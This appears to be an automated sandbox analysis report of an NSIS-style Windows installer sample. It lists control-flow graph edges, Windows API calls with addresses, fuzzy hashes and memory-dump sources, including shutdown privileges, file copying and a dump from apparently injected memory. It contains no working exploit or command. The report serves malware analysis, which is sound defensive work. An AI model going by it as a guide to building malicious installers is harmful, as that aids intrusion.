403325 3913->3918 3915 4033b9 3914->3915 3916 4034ad 3914->3916 3919 4053a8 MessageBoxIndirectA 3915->3919 3917 403530 ExitProcess 3916->3917 3920 405ea2 3 API calls 3916->3920 3922 40336b 3918->3922 3923 4033cf lstrcatA lstrcmpiA 3918->3923 3924 4033c7 ExitProcess 3919->3924 3925 4034bc 3920->3925 3926 405712 18 API calls 3922->3926 3927 4033eb CreateDirectoryA SetCurrentDirectoryA 3923->3927 3923->3952 3928 405ea2 3 API calls 3925->3928 3929 403376 3926->3929 3930 403402 3927->3930 3931 40340d 3927->3931 3933 4034c5 3928->3933 3929->3952 3957 405b77 lstrcpynA 3929->3957 3959 405b77 lstrcpynA 3930->3959 3960 405b77 lstrcpynA 3931->3960 3935 
405ea2 3 API calls 3933->3935 3938 4034ce 3935->3938 3937 403385 3958 405b77 lstrcpynA 3937->3958 3941 40351c ExitWindowsEx 3938->3941 3947 4034dc GetCurrentProcess 3938->3947 3940 405b99 18 API calls 3943 40344c DeleteFileA 3940->3943 3941->3917 3944 403529 3941->3944 3942->3912 3945 403459 CopyFileA 3943->3945 3954 40341b 3943->3954 3946 40140b 2 API calls 3944->3946 3945->3954 3946->3917 3951 4034ec 3947->3951 3948 4034a1 3949 405a2b 40 API calls 3948->3949 3949->3952 3950 405a2b 40 API calls 3950->3954 3951->3941 3952->3911 3953 405b99 18 API calls 3953->3954 3954->3940 3954->3948 3954->3950 3954->3953 3955 405347 2 API calls 3954->3955 3956 40348d CloseHandle 3954->3956 3955->3954 3956->3954 3957->3937 3958->3942 3959->3931 3960->3954 3961 401e32 3962 402a07 18 API calls 3961->3962 3963 401e38 3962->3963 3964 404e84 25 API calls 3963->3964 3965 401e42 3964->3965 3966 405347 2 API calls 3965->3966 3970 401e48 3966->3970 3967 401e9e CloseHandle 3969 40266d 3967->3969 3968 401e67 WaitForSingleObject 3968->3970 3971 401e75 GetExitCodeProcess 3968->3971 3970->3967 3970->3968 3970->3969 3972 405edb 2 API calls 3970->3972 3973 401e90 3971->3973 3974 401e87 3971->3974 3972->3968 3973->3967 3976 405ad5 wsprintfA 3974->3976 3976->3973 3977 4015b3 3978 402a07 18 API calls 3977->3978 3979 4015ba 3978->3979 3980 4056bd 4 API calls 3979->3980 3989 4015c2 3980->3989 3981 40160a 3982 401638 3981->3982 3983 40160f 3981->3983 3988 401423 25 API calls 3982->3988 3985 401423 25 API calls 3983->3985 3984 40564f CharNextA 3986 4015d0 CreateDirectoryA 3984->3986 3987 401616 3985->3987 3986->3989 3990 4015e5 GetLastError 3986->3990 3995 405b77 lstrcpynA 3987->3995 3994 401630 3988->3994 3989->3981 3989->3984 3990->3989 3991 4015f2 GetFileAttributesA 3990->3991 3991->3989 3993 401621 SetCurrentDirectoryA 3993->3994 3995->3993 3996 4039b4 3997 403b07 3996->3997 3998 4039cc 3996->3998 4000 403b58 3997->4000 4001 403b18 GetDlgItem GetDlgItem 3997->4001 3998->3997 3999 4039d8 3998->3999 
4004 4039e3 SetWindowPos 3999->4004 4005 4039f6 3999->4005 4003 403bb2 4000->4003 4013 401389 2 API calls 4000->4013 4002 403e87 19 API calls 4001->4002 4008 403b42 SetClassLongA 4002->4008 4009 403ed3 SendMessageA 4003->4009 4055 403b02 4003->4055 4004->4005 4006 403a13 4005->4006 4007 4039fb ShowWindow 4005->4007 4010 403a35 4006->4010 4011 403a1b DestroyWindow 4006->4011 4007->4006 4012 40140b 2 API calls 4008->4012 4053 403bc4 4009->4053 4014 403a3a SetWindowLongA 4010->4014 4015 403a4b 4010->4015 4063 403e10 4011->4063 4012->4000 4016 403b8a 4013->4016 4014->4055 4018 403a57 GetDlgItem 4015->4018 4030 403ac2 4015->4030 4016->4003 4019 403b8e SendMessageA 4016->4019 4017 403e12 DestroyWindow EndDialog 4017->4063 4021 403a6a SendMessageA IsWindowEnabled 4018->4021 4025 403a87 4018->4025 4019->4055 4020 40140b 2 API calls 4020->4053 4021->4025 4021->4055 4022 403eee 8 API calls 4022->4055 4023 403e41 ShowWindow 4023->4055 4024 405b99 18 API calls 4024->4053 4026 403a94 4025->4026 4028 403adb SendMessageA 4025->4028 4029 403aa7 4025->4029 4036 403a8c 4025->4036 4026->4028 4026->4036 4027 403e60 SendMessageA 4027->4030 4028->4030 4031 403ac4 4029->4031 4032 403aaf 4029->4032 4030->4022 4035 40140b 2 API calls 4031->4035 4033 40140b 2 API calls 4032->4033 4033->4036 4034 403e87 19 API calls 4034->4053 4035->4036 4036->4027 4036->4030 4037 403e87 19 API calls 4038 403c3f GetDlgItem 4037->4038 4039 403c54 4038->4039 4040 403c5c ShowWindow EnableWindow 4038->4040 4039->4040 4064 403ea9 EnableWindow 4040->4064 4042 403c86 EnableWindow 4045 403c9a 4042->4045 4043 403c9f GetSystemMenu EnableMenuItem SendMessageA 4044 403ccf SendMessageA 4043->4044 4043->4045 4044->4045 4045->4043 4065 403ebc SendMessageA 4045->4065 4066 405b77 lstrcpynA 4045->4066 4048 403cfd lstrlenA 4049 405b99 18 API calls 4048->4049 4050 403d0e SetWindowTextA 4049->4050 4051 401389 2 API calls 4050->4051 4051->4053 4052 403d52 DestroyWindow 4054 403d6c CreateDialogParamA 4052->4054 4052->4063 
4053->4017 4053->4020 4053->4024 4053->4034 4053->4037 4053->4052 4053->4055 4056 403d9f 4054->4056 4054->4063 4057 403e87 19 API calls 4056->4057 4058 403daa GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4057->4058 4059 401389 2 API calls 4058->4059 4060 403df0 4059->4060 4060->4055 4061 403df8 ShowWindow 4060->4061 4062 403ed3 SendMessageA 4061->4062 4062->4063 4063->4023 4063->4055 4064->4042 4065->4045 4066->4048 4067 402036 4068 402a07 18 API calls 4067->4068 4069 40203d 4068->4069 4070 402a07 18 API calls 4069->4070 4071 402047 4070->4071 4072 402a07 18 API calls 4071->4072 4073 402050 4072->4073 4074 402a07 18 API calls 4073->4074 4075 40205a 4074->4075 4076 402a07 18 API calls 4075->4076 4077 402064 4076->4077 4078 402078 CoCreateInstance 4077->4078 4079 402a07 18 API calls 4077->4079 4080 40214d 4078->4080 4083 402097 4078->4083 4079->4078 4081 401423 25 API calls 4080->4081 4082 40217f 4080->4082 4081->4082 4083->4080 4084 40212c MultiByteToWideChar 4083->4084 4084->4080 4085 4014b7 4086 4014bd 4085->4086 4087 401389 2 API calls 4086->4087 4088 4014c5 4087->4088 4089 402438 4090 402b11 19 API calls 4089->4090 4091 402442 4090->4091 4092 4029ea 18 API calls 4091->4092 4093 40244b 4092->4093 4094 40266d 4093->4094 4095 402462 RegEnumKeyA 4093->4095 4096 40246e RegEnumValueA 4093->4096 4097 402487 RegCloseKey 4095->4097 4096->4094 4096->4097 4097->4094 4099 401bb8 4100 4029ea 18 API calls 4099->4100 4101 401bbf 4100->4101 4102 4029ea 18 API calls 4101->4102 4103 401bc9 4102->4103 4104 401bd9 4103->4104 4105 402a07 18 API calls 4103->4105 4108 402a07 18 API calls 4104->4108 4111 401be9 4104->4111 4105->4104 4106 401bf4 4109 4029ea 18 API calls 4106->4109 4107 401c38 4110 402a07 18 API calls 4107->4110 4108->4111 4112 401bf9 4109->4112 4113 401c3d 4110->4113 4111->4106 4111->4107 4114 4029ea 18 API calls 4112->4114 4115 402a07 18 API calls 4113->4115 4116 401c02 4114->4116 4117 401c46 FindWindowExA 4115->4117 4118 401c28 SendMessageA 4116->4118 4119 
401c0a SendMessageTimeoutA 4116->4119 4120 401c64 4117->4120 4118->4120 4119->4120 4121 402239 4122 402241 4121->4122 4123 402247 4121->4123 4124 402a07 18 API calls 4122->4124 4125 402257 4123->4125 4126 402a07 18 API calls 4123->4126 4124->4123 4127 402a07 18 API calls 4125->4127 4129 402265 4125->4129 4126->4125 4127->4129 4128 402a07 18 API calls 4130 40226e WritePrivateProfileStringA 4128->4130 4129->4128 4131 4022be 4132 4022c3 4131->4132 4133 4022ee 4131->4133 4135 402b11 19 API calls 4132->4135 4134 402a07 18 API calls 4133->4134 4136 4022f5 4134->4136 4137 4022ca 4135->4137 4142 402a47 RegOpenKeyExA 4136->4142 4138 402a07 18 API calls 4137->4138 4141 40230b 4137->4141 4139 4022db RegDeleteValueA RegCloseKey 4138->4139 4139->4141 4145 402a72 4142->4145 4151 402abe 4142->4151 4143 402a98 RegEnumKeyA 4144 402aaa RegCloseKey 4143->4144 4143->4145 4147 405ea2 3 API calls 4144->4147 4145->4143 4145->4144 4146 402acf RegCloseKey 4145->4146 4148 402a47 3 API calls 4145->4148 4146->4151 4149 402aba 4147->4149 4148->4145 4150 402aea RegDeleteKeyA 4149->4150 4149->4151 4150->4151 4151->4141 4152 40163f 4153 402a07 18 API calls 4152->4153 4154 401645 4153->4154 4155 405e7b 2 API calls 4154->4155 4156 40164b 4155->4156 4157 40173f 4158 402a07 18 API calls 4157->4158 4159 401746 4158->4159 4160 401764 4159->4160 4161 40176c 4159->4161 4193 405b77 lstrcpynA 4160->4193 4194 405b77 lstrcpynA 4161->4194 4164 401777 4166 405624 3 API calls 4164->4166 4165 40176a 4168 405de2 5 API calls 4165->4168 4167 40177d lstrcatA 4166->4167 4167->4165 4187 401789 4168->4187 4169 405e7b 2 API calls 4169->4187 4170 405800 2 API calls 4170->4187 4172 4017a0 CompareFileTime 4172->4187 4173 401864 4175 404e84 25 API calls 4173->4175 4174 40183b 4176 404e84 25 API calls 4174->4176 4192 401850 4174->4192 4178 40186e 4175->4178 4176->4192 4177 401895 SetFileTime 4180 4018a7 CloseHandle 4177->4180 4178->4177 4178->4180 4179 405b99 18 API calls 4179->4187 4181 4018b8 4180->4181 4180->4192 4182 
4018d0 4181->4182 4183 4018bd 4181->4183 4186 405b99 18 API calls 4182->4186 4185 405b99 18 API calls 4183->4185 4184 405b77 lstrcpynA 4184->4187 4188 4018c5 lstrcatA 4185->4188 4189 4018d8 4186->4189 4187->4169 4187->4170 4187->4172 4187->4173 4187->4174 4187->4179 4187->4184 4190 4053a8 MessageBoxIndirectA 4187->4190 4195 405825 GetFileAttributesA CreateFileA 4187->4195 4188->4189 4191 4053a8 MessageBoxIndirectA 4189->4191 4190->4187 4191->4192 4193->4165 4194->4164 4195->4187 4196 40193f 4197 4029ea 18 API calls 4196->4197 4198 401946 4197->4198 4199 4029ea 18 API calls 4198->4199 4200 401950 4199->4200 4201 402a07 18 API calls 4200->4201 4202 401959 4201->4202 4203 40196c lstrlenA 4202->4203 4207 4019a7 4202->4207 4204 401976 4203->4204 4204->4207 4209 405b77 lstrcpynA 4204->4209 4206 401990 4206->4207 4208 40199d lstrlenA 4206->4208 4208->4207 4209->4206

                                      Control-flow Graph

                                      APIs
                                      • Sleep.KERNELBASE(00000005), ref: 05191CD8
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606940540.0000000004CE6000.00000040.00000400.00020000.00000000.sdmp, Offset: 04CE6000, based on PE: false
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: a87fffe04863857890f8b96ea649a37a322763b6f0a9565940e87421010e622a
                                      • Instruction ID: ae1f1f5b7e234b93b53a9f24a0a5fe7b42b86ebdf73e3a3ccc6da2013c8301e8
                                      • Opcode Fuzzy Hash: a87fffe04863857890f8b96ea649a37a322763b6f0a9565940e87421010e622a
                                      • Instruction Fuzzy Hash: BD1106B1680740AFD7599F71898CB5A73A1AF143A5F858A84E9528B0A6D7B8C8C0CF52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 00404819
                                      • GetDlgItem.USER32(?,00000408), ref: 00404824
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 0040486E
                                      • LoadBitmapA.USER32(0000006E), ref: 00404881
                                      • SetWindowLongA.USER32(?,000000FC,00404DF8), ref: 0040489A
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048AE
                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048C0
                                      • SendMessageA.USER32(?,00001109,00000002), ref: 004048D6
                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E2
                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048F4
                                      • DeleteObject.GDI32(00000000), ref: 004048F7
                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404922
                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040492E
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049C3
                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049EE
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A02
                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404A31
                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A3F
                                      • ShowWindow.USER32(?,00000005), ref: 00404A50
                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B4D
                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BB2
                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BC7
                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BEB
                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C0B
                                      • ImageList_Destroy.COMCTL32(?), ref: 00404C20
                                      • GlobalFree.KERNEL32(?), ref: 00404C30
                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CA9
                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404D52
                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D61
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D81
                                      • ShowWindow.USER32(?,00000000), ref: 00404DCF
                                      • GetDlgItem.USER32(?,000003FE), ref: 00404DDA
                                      • ShowWindow.USER32(00000000), ref: 00404DE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $M$N
                                      • API String ID: 1638840714-813528018
                                      • Opcode ID: d7d8be1d1430912dce9adc548270cedff44170f7b06606a19f6bf33037737e14
                                      • Instruction ID: 73e5042133b470fdde48d750d06e43d2904589ccee469aaf4ee40575ec54014f
                                      • Opcode Fuzzy Hash: d7d8be1d1430912dce9adc548270cedff44170f7b06606a19f6bf33037737e14
                                      • Instruction Fuzzy Hash: 59027FB0900209AFEB10DF54DC85AAE7BB5FB84315F10853AF610B62E1C7799E42CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      APIs
                                      • CharNextA.USER32(00000000,007A8000,00000020), ref: 0040319D
                                      • GetTempPathA.KERNEL32(00000400,007A9400,00000000,00000020), ref: 00403295
                                      • GetWindowsDirectoryA.KERNEL32(007A9400,000003FB), ref: 004032A6
                                      • lstrcatA.KERNEL32(007A9400,\Temp), ref: 004032B2
                                        • Part of subcall function 004030BB: CreateDirectoryA.KERNEL32(007A9400,00000000,007A9400,007A9400,007A9400,75EE3410,0040329C), ref: 004030DC
                                      • GetTempPathA.KERNEL32(000003FC,007A9400,007A9400,\Temp), ref: 004032C6
                                      • lstrcatA.KERNEL32(007A9400,Low), ref: 004032CE
                                      • SetEnvironmentVariableA.KERNEL32(TEMP,007A9400,007A9400,Low), ref: 004032DF
                                      • SetEnvironmentVariableA.KERNEL32(TMP,007A9400), ref: 004032E7
                                      • DeleteFileA.KERNEL32(007A9000), ref: 004032FB
                                      • OleUninitialize.OLE32(?), ref: 004033A9
                                      • ExitProcess.KERNEL32 ref: 004033C9
                                      • lstrcatA.KERNEL32(007A9400,~nsu.tmp,?,?,?), ref: 004033D5
                                      • lstrcmpiA.KERNEL32(007A9400,007A8C00), ref: 004033E1
                                      • CreateDirectoryA.KERNEL32(007A9400,?,?,?,?), ref: 004033ED
                                      • SetCurrentDirectoryA.KERNEL32(007A9400,?,?,?,?), ref: 004033F4
                                      • DeleteFileA.KERNEL32(0079D8B8,0079D8B8,?,007A3000,?,?,?,?,?), ref: 0040344D
                                      • CopyFileA.KERNEL32(007A9C00,0079D8B8,00000001), ref: 00403461
                                      • CloseHandle.KERNEL32(00000000,0079D8B8,0079D8B8,?,0079D8B8,?,?,?,?,?), ref: 0040348E
                                      • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034E3
                                      • ExitWindowsEx.USER32(00000002), ref: 0040351F
                                      • ExitProcess.KERNEL32 ref: 00403542
                                        • Part of subcall function 0040564F: CharNextA.USER32(?,0040319C,007A8000,00000020), ref: 0040565C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: Directory$ExitFileProcesslstrcat$CharCreateCurrentDeleteEnvironmentNextPathTempVariableWindows$CloseCopyHandleUninitializelstrcmpi
                                      • String ID: "$Error launching installer$Low$SeShutdownPrivilege$TEMP$TMP$\Temp$tvSU*#$~nsu.tmp
                                      • API String ID: 1354997958-186624107
                                      • Opcode ID: 95a040692256d3954bd641e11fd39166ae6047c1d6ff5cc60a8c7adb69f599e9
                                      • Instruction ID: 7605579532f520b864719d0dddd61f0d8e99e1e45b2c1984dcb213f5ff5d7eb5
                                      • Opcode Fuzzy Hash: 95a040692256d3954bd641e11fd39166ae6047c1d6ff5cc60a8c7adb69f599e9
                                      • Instruction Fuzzy Hash: BE71D670A04741BAD7117F715C89A2B3EACEF8670AF04053EF545B62D2CB7C9A018B6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 879 405454-40547a call 405712 882 405493-40549a 879->882 883 40547c-40548e DeleteFileA 879->883 885 40549c-40549e 882->885 886 4054ad-4054bd call 405b77 882->886 884 40561d-405621 883->884 887 4054a4-4054a7 885->887 888 4055cb-4055d0 885->888 894 4054cc-4054cd call 40566b 886->894 895 4054bf-4054ca lstrcatA 886->895 887->886 887->888 888->884 890 4055d2-4055d5 888->890 892 4055d7-4055dd 890->892 893 4055df-4055e7 call 405e7b 890->893 892->884 893->884 903 4055e9-4055fd call 405624 call 40540c 893->903 897 4054d2-4054d5 894->897 895->897 899 4054e0-4054e6 lstrcatA 897->899 900 4054d7-4054de 897->900 902 4054eb-405509 lstrlenA FindFirstFileA 899->902 900->899 900->902 904 4055c1-4055c5 902->904 905 40550f-405526 call 40564f 902->905 918 405615-405618 call 404e84 903->918 919 4055ff-405602 903->919 904->888 907 4055c7 904->907 912 405531-405534 905->912 913 405528-40552c 905->913 907->888 916 405536-40553b 912->916 917 405547-405555 call 405b77 912->917 913->912 915 40552e 913->915 915->912 921 4055a0-4055b2 FindNextFileA 916->921 922 40553d-40553f 916->922 930 405557-40555f 917->930 931 40556c-405577 call 40540c 917->931 918->884 919->892 924 405604-405613 call 404e84 call 405a2b 919->924 921->905 925 4055b8-4055bb FindClose 921->925 922->917 927 405541-405545 922->927 924->884 925->904 927->917 927->921 930->921 932 405561-40556a call 405454 930->932 939 405598-40559b call 404e84 931->939 940 405579-40557c 931->940 932->921 939->921 941 405590-405596 940->941 942 40557e-40558e call 404e84 call 405a2b 940->942 941->921 942->921
                                      APIs
                                      • DeleteFileA.KERNEL32(?,?), ref: 0040547D
                                      • lstrcatA.KERNEL32(0079FD00,\*.*,0079FD00,?,?), ref: 004054C5
                                      • lstrcatA.KERNEL32(?,00409014,?,0079FD00,?,?), ref: 004054E6
                                      • lstrlenA.KERNEL32(?,?,00409014,?,0079FD00,?,?), ref: 004054EC
                                      • FindFirstFileA.KERNEL32(0079FD00,?,?,?,00409014,?,0079FD00,?,?), ref: 004054FD
                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055AA
                                      • FindClose.KERNEL32(00000000), ref: 004055BB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2035342205-1173974218
                                      • Opcode ID: c626bdd4990726d426f94ccbeda85fbe9576a558e3f665863e436435b3c03f85
                                      • Instruction ID: 6c887a6cd9596c43cc691a5f5e4ea67afdeb508a4c755cd09b57e0a75bcacbf5
                                      • Opcode Fuzzy Hash: c626bdd4990726d426f94ccbeda85fbe9576a558e3f665863e436435b3c03f85
                                      • Instruction Fuzzy Hash: 6F51C030800A04BACB21AB21CC45BBF7AB9DF42318F54817BF455B11D2D73C9A82DEAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 11 404fc2-404fdd 12 404fe3-4050ac GetDlgItem * 3 call 403ebc call 404722 GetClientRect GetSystemMetrics SendMessageA * 2 11->12 13 40516e-405175 11->13 34 4050ca-4050cd 12->34 35 4050ae-4050c8 SendMessageA * 2 12->35 15 405177-405199 GetDlgItem CreateThread CloseHandle 13->15 16 40519f-4051ac 13->16 15->16 18 4051ca-4051d1 16->18 19 4051ae-4051b4 16->19 23 4051d3-4051d9 18->23 24 405228-40522c 18->24 21 4051b6-4051c5 ShowWindow * 2 call 403ebc 19->21 22 4051ec-4051f5 call 403eee 19->22 21->18 31 4051fa-4051fe 22->31 29 405201-405211 ShowWindow 23->29 30 4051db-4051e7 call 403e60 23->30 24->22 27 40522e-405231 24->27 27->22 36 405233-405246 SendMessageA 27->36 32 405221-405223 call 403e60 29->32 33 405213-40521c call 404e84 29->33 30->22 32->24 33->32 40 4050dd-4050f4 call 403e87 34->40 41 4050cf-4050db SendMessageA 34->41 35->34 42 405340-405342 36->42 43 40524c-40526d CreatePopupMenu call 405b99 AppendMenuA 36->43 50 4050f6-40510a ShowWindow 40->50 51 40512a-40514b GetDlgItem SendMessageA 40->51 41->40 42->31 48 405282-405288 43->48 49 40526f-405280 GetWindowRect 43->49 53 40528b-4052a3 TrackPopupMenu 48->53 49->53 54 405119 50->54 55 40510c-405117 ShowWindow 50->55 51->42 52 405151-405169 SendMessageA * 2 51->52 52->42 53->42 56 4052a9-4052c0 53->56 57 40511f-405125 call 403ebc 54->57 55->57 58 4052c5-4052e0 SendMessageA 56->58 57->51 58->58 60 4052e2-405302 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 58->60 61 405304-405324 SendMessageA 60->61 61->61 62 405326-40533a GlobalUnlock SetClipboardData CloseClipboard 61->62 62->42
                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 00405021
                                      • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                      • GetClientRect.USER32(?,?), ref: 0040506D
                                      • GetSystemMetrics.USER32(00000015), ref: 00405075
                                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405096
                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A7
                                      • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050BA
                                      • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050C8
                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050DB
                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                                      • ShowWindow.USER32(?,00000008), ref: 00405111
                                      • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405142
                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040515B
                                      • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405167
                                      • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                        • Part of subcall function 00403EBC: SendMessageA.USER32(00000028,?,00000001,00403CED), ref: 00403ECA
                                      • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                      • CreateThread.KERNEL32(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                      • CloseHandle.KERNEL32(00000000), ref: 00405199
                                      • ShowWindow.USER32(00000000), ref: 004051BD
                                      • ShowWindow.USER32(?,00000008), ref: 004051C2
                                      • ShowWindow.USER32(00000008), ref: 00405209
                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040523B
                                      • CreatePopupMenu.USER32 ref: 0040524C
                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                      • GetWindowRect.USER32(?,?), ref: 00405274
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D3
                                      • OpenClipboard.USER32(00000000), ref: 004052E3
                                      • EmptyClipboard.USER32 ref: 004052E9
                                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                      • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052FC
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405310
                                      • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405329
                                      • SetClipboardData.USER32(00000001,00000000), ref: 00405334
                                      • CloseClipboard.USER32 ref: 0040533A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                      • String ID: {
                                      • API String ID: 590372296-366298937
                                      • Opcode ID: bac3bf14baff21c7d8ff89fa2b24996a566b9d6b3efb833f2fdcef7c70daf826
                                      • Instruction ID: 5cc5a493c7826af022734a05619d12b61540e90d3b7798cd1ee4812e4cb533c1
                                      • Opcode Fuzzy Hash: bac3bf14baff21c7d8ff89fa2b24996a566b9d6b3efb833f2fdcef7c70daf826
                                      • Instruction Fuzzy Hash: FDA16C70900208BFEB119F60DC85AAE7F79FB44355F00816AFA05BA1A1C7795E41DFA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 274 4039b4-4039c6 275 403b07-403b16 274->275 276 4039cc-4039d2 274->276 278 403b65-403b7a 275->278 279 403b18-403b60 GetDlgItem * 2 call 403e87 SetClassLongA call 40140b 275->279 276->275 277 4039d8-4039e1 276->277 283 4039e3-4039f0 SetWindowPos 277->283 284 4039f6-4039f9 277->284 281 403bba-403bbf call 403ed3 278->281 282 403b7c-403b7f 278->282 279->278 296 403bc4-403bdf 281->296 288 403b81-403b8c call 401389 282->288 289 403bb2-403bb4 282->289 283->284 285 403a13-403a19 284->285 286 4039fb-403a0d ShowWindow 284->286 291 403a35-403a38 285->291 292 403a1b-403a30 DestroyWindow 285->292 286->285 288->289 309 403b8e-403bad SendMessageA 288->309 289->281 295 403e54 289->295 300 403a3a-403a46 SetWindowLongA 291->300 301 403a4b-403a51 291->301 298 403e31-403e37 292->298 297 403e56-403e5d 295->297 303 403be1-403be3 call 40140b 296->303 304 403be8-403bee 296->304 298->295 310 403e39-403e3f 298->310 300->297 307 403af4-403b02 call 403eee 301->307 308 403a57-403a68 GetDlgItem 301->308 303->304 305 403e12-403e2b DestroyWindow EndDialog 304->305 306 403bf4-403bff 304->306 305->298 306->305 312 403c05-403c52 call 405b99 call 403e87 * 3 GetDlgItem 306->312 307->297 313 403a87-403a8a 308->313 314 403a6a-403a81 SendMessageA IsWindowEnabled 308->314 309->297 310->295 316 403e41-403e4a ShowWindow 310->316 344 403c54-403c59 312->344 345 403c5c-403c98 ShowWindow EnableWindow call 403ea9 EnableWindow 312->345 318 403a8c-403a8d 313->318 319 403a8f-403a92 313->319 314->295 314->313 316->295 322 403abd-403ac2 call 403e60 